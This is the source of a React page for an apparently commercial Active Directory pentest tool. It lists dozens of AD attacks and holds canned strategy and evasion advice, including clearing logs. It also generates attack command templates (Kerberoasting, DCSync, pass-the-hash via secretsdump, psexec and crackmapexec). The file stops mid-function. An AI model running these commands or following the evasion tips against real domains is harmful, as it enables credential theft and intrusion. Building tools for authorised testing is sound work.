import React, { useState, useCallback, useEffect } from 'react';
import {
  Shield, Server, Users, Key, Lock, Unlock, Play, Brain,
  AlertTriangle, CheckCircle, XCircle, Loader2, Terminal,
  Database, Network, Zap, Crown, FileKey, Hash, Target,
  Search, Filter, RefreshCw, Copy, Download, Sparkles,
  Bot, Lightbulb, Rocket, Code, ChevronDown, ChevronUp,
  Activity, Settings, Eye, EyeOff, Wand2, Layers,
  Bug, FileText, Clock, Cpu, Grid, List, FolderTree, Award
} from 'lucide-react';
import { usePageTitle } from '../../hooks/usePageTitle';
import { useI18n } from '../../i18n';
import { useWorkspace } from '../../contexts/WorkspaceContext';
import CGUModal from '../../components/CGUModal';
import { ADWelcomeBanner } from '../../components/WelcomeBanner';
import PlanRestrictedPage from '../../components/PlanRestrictedPage';
import ADAttackWizard from '../../components/wizards/ADAttackWizard';
import LDAPScanPanel from '../../components/ad/LDAPScanPanel';
import ADPentestResultsTable from '../../components/ad/ADPentestResultsTable';
import MarkdownRenderer from '../../components/common/MarkdownRenderer';

const API_BASE = process.env.REACT_APP_API_URL || '';

const ADPentest = () => {
  const { t } = useI18n();
  const { activeWorkspace } = useWorkspace();
  usePageTitle('Active Directory - Pentest');

  const [showCGUModal, setShowCGUModal] = useState(false);
  const [pendingAttack, setPendingAttack] = useState(null);
  const [dcConfig, setDcConfig] = useState({
    domain: '',
    dc_ip: '',
    username: '',
    password: '',
    hash: ''
  });
  const [showPassword, setShowPassword] = useState(false);

  const [selectedAttack, setSelectedAttack] = useState(null);
  const [attackResults, setAttackResults] = useState([]);
  const [isRunning, setIsRunning] = useState(false);
  const [aiAssistEnabled, setAiAssistEnabled] = useState(false);

  // Search and filters
  const [searchTerm, setSearchTerm] = useState('');
  const [selectedCategory, setSelectedCategory] = useState('all');
  const [viewMode, setViewMode] = useState('grid');
  const [expandedCategory, setExpandedCategory] = useState(null);

  // AI Assistant state
  const [showAIPanel, setShowAIPanel] = useState(false);
  const [aiQuery, setAiQuery] = useState('');
  const [aiResponse, setAiResponse] = useState(null);
  const [aiLoading, setAiLoading] = useState(false);
  const [aiHistory, setAiHistory] = useState([]);

  // PoC Auto state
  const [showPoCPanel, setShowPoCPanel] = useState(false);
  const [selectedAttacks, setSelectedAttacks] = useState([]);
  const [pocResults, setPocResults] = useState([]);
  const [pocLoading, setPocLoading] = useState(false);

  // AD Attack Wizard state
  const [showWizard, setShowWizard] = useState(false);



  // Main tab state (ad_attacks or ldap)
  const [mainTab, setMainTab] = useState('ad_attacks');

  // Stats
  const [stats, setStats] = useState({
    total_attacks: 0,
    successful: 0,
    failed: 0,
    credentials_found: 0,
    users_enumerated: 0,
    paths_discovered: 0
  });
  const [statsLoading, setStatsLoading] = useState(false);

  const getAuthHeaders = () => ({
    'Content-Type': 'application/json',
    'Authorization': `Bearer ${localStorage.getItem('access_token')}`,
  });

  // Load AD stats from backend on mount and when workspace changes
  useEffect(() => {
    // Immediately reset on workspace change
    setStats({ total_attacks: 0, successful: 0, failed: 0, credentials_found: 0, users_enumerated: 0, paths_discovered: 0 });
    setAttackResults([]);
    const fetchStats = async () => {
      setStatsLoading(true);
      try {
        const url = activeWorkspace?.id
          ? `${API_BASE}/api/v1/ad-wizard/stats?workspace_id=${activeWorkspace.id}`
          : `${API_BASE}/api/v1/ad-wizard/stats`;
        const response = await fetch(url, { headers: getAuthHeaders() });

        // Handle 401 Unauthorized - silently return, user will be redirected to login
        if (response.status === 401) {
          return;
        }

        if (response.ok) {
          const data = await response.json();
          setStats({
            total_attacks: data.total_attacks || 0,
            successful: data.successful || 0,
            failed: data.failed || 0,
            credentials_found: data.credentials_found || 0,
            users_enumerated: data.users_enumerated || 0,
            paths_discovered: data.paths_discovered || 0
          });
        }
      } catch (error) {
        console.error('Failed to fetch AD stats:', error);
      } finally {
        setStatsLoading(false);
      }
    };
    fetchStats();
  }, [activeWorkspace]);

  // Watcher always active at startup
  useEffect(() => {
    fetch(`${API_BASE}/api/v1/ad-wizard/session-watcher/toggle?enabled=true`, {
      method: 'POST', headers: getAuthHeaders()
    }).catch(() => {});
  }, []);

  // Refresh stats after wizard completes
  const refreshStats = useCallback(async () => {
    try {
      const url = activeWorkspace?.id
        ? `${API_BASE}/api/v1/ad-wizard/stats?workspace_id=${activeWorkspace.id}`
        : `${API_BASE}/api/v1/ad-wizard/stats`;
      const response = await fetch(url, { headers: getAuthHeaders() });

      // Handle 401 Unauthorized - silently return
      if (response.status === 401) {
        return;
      }

      if (response.ok) {
        const data = await response.json();
        setStats({
          total_attacks: data.total_attacks || 0,
          successful: data.successful || 0,
          failed: data.failed || 0,
          credentials_found: data.credentials_found || 0,
          users_enumerated: data.users_enumerated || 0,
          paths_discovered: data.paths_discovered || 0
        });
      }
    } catch (error) {
      console.error('Failed to refresh AD stats:', error);
    }
  }, [activeWorkspace]);

  const attackCategories = [
    {
      id: 'reconnaissance',
      name: 'Reconnaissance',
      icon: <Target className="w-5 h-5" />,
      color: 'blue',
      description: 'Enumeration and information gathering',
      attacks: [
        { id: 'enum_users', name: 'Enum Users (LDAP)', tool: 'ldapsearch', description: 'User enumeration via LDAP', mitre: 'T1087.002' },
        { id: 'enum_groups', name: 'Enum Groups', tool: 'ldapsearch', description: 'Liste des groupes et membres', mitre: 'T1069.002' },
        { id: 'enum_computers', name: 'Enum Computers', tool: 'ldapsearch', description: 'Liste des machines du domaine', mitre: 'T1018' },
        { id: 'bloodhound', name: 'BloodHound Collection', tool: 'bloodhound-python', description: 'Collecte des chemins d\'attaque', mitre: 'T1087' },
        { id: 'enum_shares', name: 'Enum SMB Shares', tool: 'smbclient', description: 'Liste des partages reseau', mitre: 'T1135' },
        { id: 'enum_spns', name: 'Enum SPNs', tool: 'GetUserSPNs.py', description: 'Service Principal Names enumeration', mitre: 'T1558.003' },
        { id: 'powerhuntshares', name: 'PowerHuntShares v2', tool: 'PowerHuntShares', description: 'Audit des permissions SMB shares', mitre: 'T1135', isNew: true },
        { id: 'powerhuntshares_excessive', name: 'Excessive Privileges', tool: 'PowerHuntShares', description: 'Shares avec Everyone/Domain Users', mitre: 'T1135' },
        { id: 'powerhuntshares_highrisk', name: 'High-Risk Shares', tool: 'PowerHuntShares', description: 'wwwroot, backups, exposed configs', mitre: 'T1039' },
      ]
    },
    {
      id: 'credential_attacks',
      name: 'Attaques Credentials',
      icon: <Key className="w-5 h-5" />,
      color: 'yellow',
      description: 'Credential retrieval and cracking',
      attacks: [
        { id: 'kerberoast', name: 'Kerberoasting', tool: 'GetUserSPNs.py', description: 'Extraction de tickets TGS pour cracking', mitre: 'T1558.003' },
        { id: 'asreproast', name: 'AS-REP Roasting', tool: 'GetNPUsers.py', description: 'Attaque sur comptes sans pre-auth', mitre: 'T1558.004' },
        { id: 'password_spray', name: 'Password Spraying', tool: 'crackmapexec', description: 'Test de mots de passe communs', mitre: 'T1110.003' },
        { id: 'brute_force', name: 'Brute Force', tool: 'hydra', description: 'Attaque par force brute', mitre: 'T1110.001' },
        { id: 'ntlm_relay', name: 'NTLM Relay', tool: 'ntlmrelayx.py', description: 'Relais d\'authentification NTLM', mitre: 'T1557.001' },
        { id: 'responder', name: 'Responder (LLMNR/NBT-NS)', tool: 'responder', description: 'Capture de hashes via poisoning', mitre: 'T1557.001' },
      ]
    },
    {
      id: 'lateral_movement',
      name: 'Mouvement Lateral',
      icon: <Network className="w-5 h-5" />,
      color: 'orange',
      description: 'Propagation dans le reseau',
      attacks: [
        { id: 'pass_the_hash', name: 'Pass-the-Hash', tool: 'psexec.py', description: 'Authentification avec hash NTLM', mitre: 'T1550.002' },
        { id: 'pass_the_ticket', name: 'Pass-the-Ticket', tool: 'mimikatz', description: 'Reutilisation de tickets Kerberos', mitre: 'T1550.003' },
        { id: 'overpass_the_hash', name: 'Overpass-the-Hash', tool: 'mimikatz', description: 'Conversion hash vers ticket', mitre: 'T1550.002' },
        { id: 'wmi_exec', name: 'WMI Exec', tool: 'wmiexec.py', description: 'Execution via WMI', mitre: 'T1047' },
        { id: 'psexec', name: 'PSExec', tool: 'psexec.py', description: 'Execution via SMB', mitre: 'T1569.002' },
        { id: 'dcom_exec', name: 'DCOM Exec', tool: 'dcomexec.py', description: 'Execution via DCOM', mitre: 'T1021.003' },
      ]
    },
    {
      id: 'privilege_escalation',
      name: 'Privilege Escalation',
      icon: <Crown className="w-5 h-5" />,
      color: 'red',
      description: 'Elevation to Domain Admin',
      attacks: [
        { id: 'dcsync', name: 'DCSync', tool: 'secretsdump.py', description: 'DC replication to dump hashes', mitre: 'T1003.006' },
        { id: 'golden_ticket', name: 'Golden Ticket', tool: 'mimikatz', description: 'TGT creation with krbtgt hash', mitre: 'T1558.001' },
        { id: 'silver_ticket', name: 'Silver Ticket', tool: 'mimikatz', description: 'Forged TGS creation', mitre: 'T1558.002' },
        { id: 'skeleton_key', name: 'Skeleton Key', tool: 'mimikatz', description: 'Backdoor master key sur DC', mitre: 'T1556.001' },
        { id: 'zerologon', name: 'ZeroLogon (CVE-2020-1472)', tool: 'zerologon.py', description: 'Reset password DC', mitre: 'T1210' },
        { id: 'printnightmare', name: 'PrintNightmare', tool: 'CVE-2021-1675.py', description: 'RCE via Print Spooler', mitre: 'T1210' },
      ]
    },
    {
      id: 'persistence',
      name: 'Persistance',
      icon: <Lock className="w-5 h-5" />,
      color: 'purple',
      description: 'Maintien de l\'acces',
      attacks: [
        { id: 'add_domain_admin', name: 'Add Domain Admin', tool: 'net user', description: 'Ajout utilisateur Domain Admins', mitre: 'T1136.002' },
        { id: 'acl_abuse', name: 'ACL Abuse', tool: 'PowerView', description: 'Modification des ACLs', mitre: 'T1222.001' },
        { id: 'sid_history', name: 'SID History Injection', tool: 'mimikatz', description: 'Injection SID dans historique', mitre: 'T1134.005' },
        { id: 'shadow_credentials', name: 'Shadow Credentials', tool: 'Whisker', description: 'Ajout de credentials alternatifs', mitre: 'T1098' },
        { id: 'dpersist', name: 'Domain Persistence', tool: 'mimikatz', description: 'Persistance niveau domaine', mitre: 'T1098' },
      ]
    },
    {
      id: 'secrets_dump',
      name: 'Extraction Secrets',
      icon: <Database className="w-5 h-5" />,
      color: 'green',
      description: 'Dump de credentials et secrets',
      attacks: [
        { id: 'sam_dump', name: 'SAM Dump', tool: 'secretsdump.py', description: 'Extraction SAM locale', mitre: 'T1003.002' },
        { id: 'lsa_secrets', name: 'LSA Secrets', tool: 'secretsdump.py', description: 'Extraction secrets LSA', mitre: 'T1003.004' },
        { id: 'ntds_dump', name: 'NTDS.dit Dump', tool: 'secretsdump.py', description: 'Dump de la base AD', mitre: 'T1003.003' },
        { id: 'lsass_dump', name: 'LSASS Dump', tool: 'procdump/mimikatz', description: 'Dump memoire LSASS', mitre: 'T1003.001' },
        { id: 'dpapi_dump', name: 'DPAPI Secrets', tool: 'mimikatz', description: 'Extraction secrets DPAPI', mitre: 'T1555.004' },
        { id: 'gpp_passwords', name: 'GPP Passwords', tool: 'gpp-decrypt', description: 'Passwords dans Group Policy', mitre: 'T1552.006' },
      ]
    },
    {
      id: 'adcs',
      name: 'ADCS / PKI',
      icon: <FileKey className="w-5 h-5" />,
      color: 'pink',
      description: 'Active Directory Certificate Services (ESC1-ESC15)',
      attacks: [
        { id: 'adcs_esc1', name: 'ESC1 — SAN Spoofing', tool: 'certipy', description: 'Template allows SAN in CSR → impersonation DA', mitre: 'T1649' },
        { id: 'adcs_esc2', name: 'ESC2 — Any Purpose', tool: 'certipy', description: 'Template avec EKU Any Purpose ou vide', mitre: 'T1649' },
        { id: 'adcs_esc3', name: 'ESC3 — Enrollment Agent', tool: 'certipy', description: 'Enrollment delegation for third party', mitre: 'T1649' },
        { id: 'adcs_esc4', name: 'ESC4 — Template Misconfiguration', tool: 'certipy', description: 'ACL write sur template → modification', mitre: 'T1649' },
        { id: 'adcs_esc5', name: 'ESC5 — PKI Object Control', tool: 'certipy', description: 'PKI object control (CA, certificates)', mitre: 'T1649' },
        { id: 'adcs_esc6', name: 'ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2', tool: 'certipy', description: 'Flag CA permet SAN → DA via UPN', mitre: 'T1649' },
        { id: 'adcs_esc7', name: 'ESC7 — CA Manage Certificates', tool: 'certipy', description: 'Droits ManageCA/ManageCertificates', mitre: 'T1649' },
        { id: 'adcs_esc8', name: 'ESC8 — NTLM Relay to AD CS HTTP', tool: 'certipy', description: 'Relay NTLM vers enrollement HTTP de la CA', mitre: 'T1557' },
        { id: 'adcs_esc9', name: 'ESC9 — No Security Extension', tool: 'certipy', description: 'szOID_NTDS_CA_SECURITY_EXT non requis', mitre: 'T1649' },
        { id: 'adcs_esc10', name: 'ESC10 — Weak Certificate Mappings', tool: 'certipy', description: 'Mappage de certificat faible (UPN)', mitre: 'T1649' },
        { id: 'adcs_esc11', name: 'ESC11 — IF_ENFORCEENCRYPTICERTREQUEST', tool: 'certipy', description: 'NTLM relay to CA RPC (unencrypted)', mitre: 'T1557' },
        { id: 'adcs_esc13', name: 'ESC13 — OID Group Link', tool: 'certipy', description: 'OID link → privileged group via issuance policy', mitre: 'T1649' },
        { id: 'adcs_esc15', name: 'ESC15 — EKUwu Abuse', tool: 'certipy', description: 'Schema v1 without EKU → application policy injection', mitre: 'T1649' },
        { id: 'adcs_golden_cert', name: 'Golden Certificate', tool: 'certipy', description: 'Certificate forgery with stolen CA key', mitre: 'T1553.004' },
        { id: 'adcs_shadow_cred', name: 'Shadow Credentials (ADCS)', tool: 'certipy', description: 'msDS-KeyCredentialLink via ADCS', mitre: 'T1098.007' },
      ]
    },
    {
      id: 'coercion',
      name: 'Coercion d\'Authentification',
      icon: <Zap className="w-5 h-5" />,
      color: 'orange',
      description: 'Forcer l\'authentification NTLM/Kerberos d\'une machine',
      attacks: [
        { id: 'petitpotam', name: 'PetitPotam (MS-EFSR)', tool: 'PetitPotam.py', description: 'Coerce auth via MS-EFSR EfsRpcOpenFileRaw', mitre: 'T1187' },
        { id: 'printerbug', name: 'PrinterBug (SpoolSS)', tool: 'printerbug.py', description: 'Coerce via MS-RPRN SpoolerService', mitre: 'T1187' },
        { id: 'dfscoerce', name: 'DFSCoerce (MS-DFSNM)', tool: 'dfscoerce.py', description: 'Coerce via MS-DFSNM DFS Namespace', mitre: 'T1187' },
        { id: 'shadowcoerce', name: 'ShadowCoerce (MS-FSRVP)', tool: 'shadowcoerce.py', description: 'Coerce via MS-FSRVP shadow copies', mitre: 'T1187' },
        { id: 'coercer_all', name: 'Coercer (all methods)', tool: 'coercer', description: 'Automated test of all coercion vectors', mitre: 'T1187' },
      ]
    },
    {
      id: 'relay',
      name: 'NTLM Relay',
      icon: <Network className="w-5 h-5" />,
      color: 'red',
      description: 'Relay d\'authentification NTLM vers d\'autres services',
      attacks: [
        { id: 'ntlm_relay_ldap', name: 'NTLM Relay → LDAP(S)', tool: 'ntlmrelayx.py', description: 'Relay to LDAP for delegation or account addition', mitre: 'T1557.001' },
        { id: 'ntlm_relay_smb', name: 'NTLM Relay → SMB', tool: 'ntlmrelayx.py', description: 'Relay to SMB for command execution', mitre: 'T1557.001' },
        { id: 'ntlm_relay_adcs', name: 'NTLM Relay → AD CS HTTP', tool: 'ntlmrelayx.py', description: 'Relay vers CA pour obtenir certificat (ESC8)', mitre: 'T1557.001' },
        { id: 'mitm6_relay', name: 'mitm6 + Relay IPv6', tool: 'mitm6', description: 'DHCPv6 poisoning + relay NTLM via IPv6', mitre: 'T1557.003' },
      ]
    },
    {
      id: 'delegation',
      name: 'Kerberos Delegation',
      icon: <Layers className="w-5 h-5" />,
      color: 'blue',
      description: 'Kerberos delegation abuse (Unconstrained/Constrained/RBCD)',
      attacks: [
        { id: 'unconstrained_deleg', name: 'Unconstrained Delegation', tool: 'rubeus/getST.py', description: 'Machine with unconstrained delegation → TGT capture', mitre: 'T1558' },
        { id: 'constrained_deleg', name: 'Constrained Delegation (S4U)', tool: 'getST.py', description: 'S4U2Proxy → impersonation via delegated service', mitre: 'T1558' },
        { id: 'rbcd', name: 'Resource-Based Constrained Delegation', tool: 'rbcd.py', description: 'Write msDS-AllowedToActOnBehalfOfOtherIdentity', mitre: 'T1558' },
      ]
    },
    {
      id: 'trust_abuse',
      name: 'Trust Abuse / Forest',
      icon: <FolderTree className="w-5 h-5" />,
      color: 'purple',
      description: 'Abuse of trust relationships between domains/forests',
      attacks: [
        { id: 'child_to_parent', name: 'Child → Parent Domain', tool: 'ticketer.py', description: 'ExtraSID via Golden Ticket pour escalade vers domaine parent', mitre: 'T1134.005' },
        { id: 'forest_trust', name: 'Forest Trust Abuse', tool: 'ticketer.py', description: 'SID History injection between forests with trust', mitre: 'T1134.005' },
      ]
    },
    {
      id: 'sccm',
      name: 'SCCM / MECM',
      icon: <Server className="w-5 h-5" />,
      color: 'gray',
      description: 'Abus de Microsoft Endpoint Configuration Manager',
      attacks: [
        { id: 'sccm_recon', name: 'SCCM Reconnaissance', tool: 'sccmhunter', description: 'SCCM server and hierarchy discovery', mitre: 'T1046' },
        { id: 'sccm_naa', name: 'NAA Credentials', tool: 'sccmhunter', description: 'Extraction credentials Network Access Account', mitre: 'T1552' },
        { id: 'sccm_deploy', name: 'Malicious Deployment', tool: 'sccmhunter', description: 'Malicious script deployment via SCCM', mitre: 'T1072' },
      ]
    },
  ];

  // AI Quick prompts
  const aiQuickPrompts = [
    { icon: Target, label: 'Initial strategy', query: 'What strategy do you recommend for attacking this AD domain?' },
    { icon: Key, label: 'Get credentials', query: 'How to obtain credentials without initial access?' },
    { icon: Crown, label: 'Devenir DA', query: 'Quel est le chemin le plus rapide vers Domain Admin ?' },
    { icon: Shield, label: 'Avoid detection', query: 'How to avoid detection during the AD attack?' },
  ];

  // AI Assistant query
  const askAI = async (query) => {
    setAiLoading(true);
    try {
      const response = await fetch(`${API_BASE}/api/v1/ai/analyze`, {
        method: 'POST',
        headers: getAuthHeaders(),
        body: JSON.stringify({
          query,
          context: {
            domain: dcConfig.domain,
            dc_ip: dcConfig.dc_ip,
            attack_history: attackResults.slice(0, 5),
            type: 'ad_pentest_analysis'
          }
        }),
      });

      // Handle 401 Unauthorized - silently return
      if (response.status === 401) {
        return;
      }

      if (response.ok) {
        const data = await response.json();
        const newResponse = {
          query,
          response: data.response || data.analysis,
          suggestions: data.suggestions || [],
          attacks_recommended: data.attacks || [],
          timestamp: new Date().toISOString()
        };
        setAiResponse(newResponse);
        setAiHistory(prev => [newResponse, ...prev.slice(0, 9)]);
      } else {
        const localAnalysis = generateLocalADAnalysis(query);
        setAiResponse(localAnalysis);
        setAiHistory(prev => [localAnalysis, ...prev.slice(0, 9)]);
      }
    } catch (err) {
      console.error('AI query failed:', err);
      const localAnalysis = generateLocalADAnalysis(query);
      setAiResponse(localAnalysis);
    } finally {
      setAiLoading(false);
      setAiQuery('');
    }
  };

  // Local AI analysis for AD
  const generateLocalADAnalysis = (query) => {
    let response = '';
    let suggestions = [];
    let attacks_recommended = [];

    const lowerQuery = query.toLowerCase();

    if (lowerQuery.includes('strategy') || lowerQuery.includes('strategie') || lowerQuery.includes('initial') || lowerQuery.includes('start')) {
      response = `Recommended AD Attack Strategy:\n\n`;
      response += `Phase 1 - Reconnaissance:\n`;
      response += `1. Anonymous LDAP enumeration (if allowed)\n`;
      response += `2. Collection BloodHound pour mapper les chemins\n`;
      response += `3. Identification des comptes de service (SPNs)\n\n`;
      response += `Phase 2 - Credential Harvesting:\n`;
      response += `4. Kerberoasting on identified SPNs\n`;
      response += `5. AS-REP Roasting on accounts without pre-auth\n`;
      response += `6. Password Spraying avec passwords communs\n\n`;
      response += `Phase 3 - Exploitation:\n`;
      response += `7. Pass-the-Hash avec credentials obtenus\n`;
      response += `8. DCSync une fois Domain Admin`;
      suggestions = ['Launch BloodHound', 'Test Kerberoasting', 'Check AS-REP'];
      attacks_recommended = ['bloodhound', 'kerberoast', 'asreproast'];
    } else if (lowerQuery.includes('credential') || lowerQuery.includes('password') || lowerQuery.includes('hash')) {
      response = `Credential Retrieval Techniques:\n\n`;
      response += `Without initial access:\n`;
      response += `- Responder (LLMNR/NBT-NS poisoning)\n`;
      response += `- Password Spraying with custom list\n`;
      response += `- AS-REP Roasting (if vulnerable accounts)\n\n`;
      response += `With user access:\n`;
      response += `- Kerberoasting pour comptes de service\n`;
      response += `- LSASS dump sur machine compromise\n`;
      response += `- GPP Passwords dans SYSVOL\n\n`;
      response += `With local admin access:\n`;
      response += `- SAM/LSA dump\n`;
      response += `- Mimikatz sekurlsa::logonpasswords`;
      suggestions = ['Configurer Responder', 'Lancer Password Spray', 'Tester AS-REP Roast'];
      attacks_recommended = ['responder', 'password_spray', 'asreproast', 'kerberoast'];
    } else if (lowerQuery.includes('domain admin') || lowerQuery.includes('da') || lowerQuery.includes('privilege')) {
      response = `Chemins vers Domain Admin:\n\n`;
      response += `Chemin 1 - Kerberoasting:\n`;
      response += `- Find SPN with elevated privileges\n`;
      response += `- Cracker le ticket TGS\n`;
      response += `- Utiliser les credentials pour escalade\n\n`;
      response += `Chemin 2 - ACL Abuse:\n`;
      response += `- Identifier GenericAll/WriteDACL sur groupes\n`;
      response += `- Modifier les ACLs pour s'ajouter au groupe\n\n`;
      response += `Path 3 - Delegation:\n`;
      response += `- Find accounts with unconstrained delegation\n`;
      response += `- Forcer authentification d'un DA\n`;
      response += `- Capturer le TGT\n\n`;
      response += `Chemin 4 - CVEs:\n`;
      response += `- ZeroLogon (CVE-2020-1472)\n`;
      response += `- PrintNightmare (CVE-2021-1675)`;
      suggestions = ['Analyze BloodHound', 'Check delegations', 'Test ZeroLogon'];
      attacks_recommended = ['bloodhound', 'dcsync', 'zerologon'];
    } else if (lowerQuery.includes('detection') || lowerQuery.includes('eviter') || lowerQuery.includes('stealth')) {
      response = `AD Evasion Techniques:\n\n`;
      response += `Avoid alerts:\n`;
      response += `- Utiliser des outils natifs (net.exe, PowerShell)\n`;
      response += `- Limit the number of LDAP queries\n`;
      response += `- Espacer les tentatives de Password Spraying\n`;
      response += `- Avoid abnormal behaviors\n\n`;
      response += `Techniques OPSEC:\n`;
      response += `- Use legitimate connections (WinRM vs PSExec)\n`;
      response += `- Avoid touching the DC directly\n`;
      response += `- Nettoyer les logs si possible\n`;
      response += `- Utiliser des comptes de service existants`;
      suggestions = ['Use WMI', 'Avoid PSExec', 'Space out requests'];
      attacks_recommended = ['wmi_exec', 'dcom_exec'];
    } else {
      response = `Analyse AD Pentest:\n\n`;
      response += `Configuration actuelle:\n`;
      response += `- Domain: ${dcConfig.domain || 'Not configured'}\n`;
      response += `- DC IP: ${dcConfig.dc_ip || 'Not configured'}\n`;
      response += `- Attacks executed: ${attackResults.length}\n\n`;
      response += `General recommendations:\n`;
      response += `1. Always start with reconnaissance\n`;
      response += `2. Use BloodHound to visualize attack paths\n`;
      response += `3. Prioritize silent attacks\n`;
      response += `4. Document each step for the report`;
      suggestions = ['Configure domain', 'Launch reconnaissance', 'View BloodHound'];
      attacks_recommended = ['enum_users', 'bloodhound', 'enum_shares'];
    }

    return {
      query,
      response,
      suggestions,
      attacks_recommended,
      timestamp: new Date().toISOString(),
      isLocal: true
    };
  };

  // Generate PoC code for attack
  const generatePoCCode = (attack) => {
    const domain = dcConfig.domain || 'DOMAIN.LOCAL';
    const dc_ip = dcConfig.dc_ip || 'DC_IP';
    const username = dcConfig.username || 'USERNAME';
    const password = dcConfig.password || 'PASSWORD';

    const templates = {
      'kerberoast': `#!/bin/bash
# Kerberoasting - ${attack.name}
# MITRE: ${attack.mitre}

# Using Impacket GetUserSPNs
python3 GetUserSPNs.py ${domain}/${username}:${password} -dc-ip ${dc_ip} -request -outputfile kerberoast_hashes.txt

# Crack with hashcat
hashcat -m 13100 kerberoast_hashes.txt /path/to/wordlist.txt`,

      'asreproast': `#!/bin/bash
# AS-REP Roasting - ${attack.name}
# MITRE: ${attack.mitre}

# Get AS-REP hashes for users without pre-auth
python3 GetNPUsers.py ${domain}/ -dc-ip ${dc_ip} -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt

# Crack with hashcat
hashcat -m 18200 asrep_hashes.txt /path/to/wordlist.txt`,

      'bloodhound': `#!/bin/bash
# BloodHound Collection - ${attack.name}
# MITRE: ${attack.mitre}

# Using bloodhound-python
bloodhound-python -u ${username} -p '${password}' -d ${domain} -dc ${dc_ip} -c All --zip

# Import zip file into BloodHound GUI`,

      'pass_the_hash': `#!/bin/bash
# Pass-the-Hash - ${attack.name}
# MITRE: ${attack.mitre}

# Using psexec.py with NTLM hash
python3 psexec.py ${domain}/${username}@${dc_ip} -hashes :NTLM_HASH_HERE

# Or using crackmapexec
crackmapexec smb ${dc_ip} -u ${username} -H NTLM_HASH_HERE -d ${domain}`,

      'dcsync': `#!/bin/bash
# DCSync Attack - ${attack.name}
# MITRE: ${attack.mitre}

# Dump all domain hashes (requires DA privileges)
python3 secretsdump.py ${domain}/${username}:${password}@${dc_ip} -just-dc

# Dump specific user
python3 secretsdump.py ${domain}/${username}:${password}@${dc_ip} -just-dc-user krbtgt`,

      'zerologon': `#!/usr/bin/env python3
# ZeroLogon (CVE-2020-1472) - ${attack.name}
# MITRE: ${attack.mitre}
# WARNING: This will reset the DC machine account password!

from impacket.dcerpc.v5 import nrpc, epm
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import transport

dc_name = "DC_NETBIOS_NAME"
dc_ip = "${dc_ip}"

# Exploit code here - use responsibly!
print("[!] This exploit will reset the DC machine account password")
print("[!] Make sure you have authorization before proceeding")`,

      'powerhuntshares': `# PowerHuntShares v2 - SMB Share Permission Audit
# MITRE: ${attack.mitre}
# Tool: PowerHuntShares (NetSPI)
# https://github.com/NetSPI/PowerHuntShares

# Option 1: Via PowerShell (Windows)
Import-Module .\\PowerHuntShares.psm1
Invoke-HuntSMBShares -Threads 20 -OutputDirectory ".\\ShareAudit" \\
  -DomainController ${dc_ip} -Username ${username} -Password ${password}

# Option 2: Via API (Sylink Platform)
curl -X POST "${API_BASE}/api/v1/ad-tools/powerhuntshares/hunt" \\
  -H "Authorization: Bearer \$TOKEN" \\
  -H "Content-Type: application/json" \\
  -d '{
    "domain": "${domain}",
    "username": "${username}",
    "password": "${password}",
    "dc_ip": "${dc_ip}",
    "threads": 10,
    "scan_admin_shares": true,
    "scan_hidden_shares": true
  }'

# Results will include:
# - All accessible shares with permissions
# - ACL analysis for each share
# - Risk scoring based on exposure`,

      'powerhuntshares_excessive': `# PowerHuntShares - Excessive Privileges Detection
# MITRE: ${attack.mitre}
# Finds shares accessible to Everyone, Domain Users, Authenticated Users

# Via API (Sylink Platform)
curl -X POST "${API_BASE}/api/v1/ad-tools/powerhuntshares/excessive-privileges" \\
  -H "Authorization: Bearer \$TOKEN" \\
  -H "Content-Type: application/json" \\
  -d '{
    "domain": "${domain}",
    "username": "${username}",
    "password": "${password}",
    "dc_ip": "${dc_ip}"
  }'

# PowerShell Alternative
Invoke-HuntSMBShares -Threads 20 -OutputDirectory ".\\ShareAudit" | \\
  Where-Object {
    \$_.ShareACL -match "Everyone|Domain Users|Authenticated Users" -and
    \$_.ShareACL -match "Write|FullControl|Modify"
  }

# Look for:
# - Shares with Everyone: FULL_CONTROL
# - Domain Users with Write access
# - Sensitive folders (finance, hr, backup) exposed`,

      'powerhuntshares_highrisk': `# PowerHuntShares - High-Risk Shares Detection
# MITRE: ${attack.mitre}
# Identifies wwwroot, backups, configs, scripts exposed

# Via API (Sylink Platform)
curl -X POST "${API_BASE}/api/v1/ad-tools/powerhuntshares/high-risk" \\
  -H "Authorization: Bearer \$TOKEN" \\
  -H "Content-Type: application/json" \\
  -d '{
    "domain": "${domain}",
    "username": "${username}",
    "password": "${password}",
    "dc_ip": "${dc_ip}"
  }'

# High-risk patterns to look for:
# - wwwroot / inetpub (web configs, connection strings)
# - backup / backups (potential credential files)
# - scripts / deploy (deployment scripts with creds)
# - config / configs (configuration files)
# - sql / database (database backups)
# - admin$ / c$ (administrative shares)

# Exploitation after discovery:
# 1. Check for web.config with connection strings
# 2. Look for .ps1/.bat scripts with hardcoded creds
# 3. Search for .xml files with passwords
# 4. Find .sql backup files with user tables`,

      'default': `#!/bin/bash
# ${attack.name}
# Tool: ${attack.tool}
# MITRE: ${attack.mitre}
# Description: ${attack.description}

# Target Configuration
DOMAIN="${domain}"
DC_IP="${dc_ip}"
USERNAME="${username}"
PASSWORD="${password}"

echo "[*] Executing ${attack.name}..."
echo "[*] Tool: ${attack.tool}"
echo "[*] Target: $DC_IP"

# Add your custom commands here
# Refer to ${attack.tool} documentation`
    };

    return templates[attack.id] || templates['default'];
  };

  // Execute Auto PoC chain
  const executeAutoPoCChain = async () => {
    if (selectedAttacks.length === 0) return;

    setPocLoading(true);
    setPocResults([]);

    for (const attackId of selectedAttacks) {
      const attack = attackCategories
        .flatMap(c => c.attacks)
        .find(a => a.id === attackId);

      if (attack) {
        const result = {
          attack_id: attackId,
          attack_name: attack.name,
          tool: attack.tool,
          status: 'running',
          started_at: new Date().toISOString(),
          poc_code: generatePoCCode(attack)
        };

        setPocResults(prev => [...prev, result]);

        // Simulate execution
        await new Promise(resolve => setTimeout(resolve, 2000));

        setPocResults(prev => prev.map(r =>
          r.attack_id === attackId
            ? { ...r, status: 'completed', completed_at: new Date().toISOString() }
            : r
        ));
      }
    }

    setPocLoading(false);
    setSelectedAttacks([]);
  };

  const handleAttackClick = (attack) => {
    setPendingAttack(attack);
    setShowCGUModal(true);
  };

  const handleCGUAccept = () => {
    if (pendingAttack) {
      executeAttack(pendingAttack);
      setPendingAttack(null);
    }
  };

  const executeAttack = async (attack) => {
    setIsRunning(true);
    setSelectedAttack(attack);

    const newResult = {
      id: Date.now(),
      attack: attack.name,
      attack_id: attack.id,
      tool: attack.tool,
      mitre: attack.mitre,
      status: 'running',
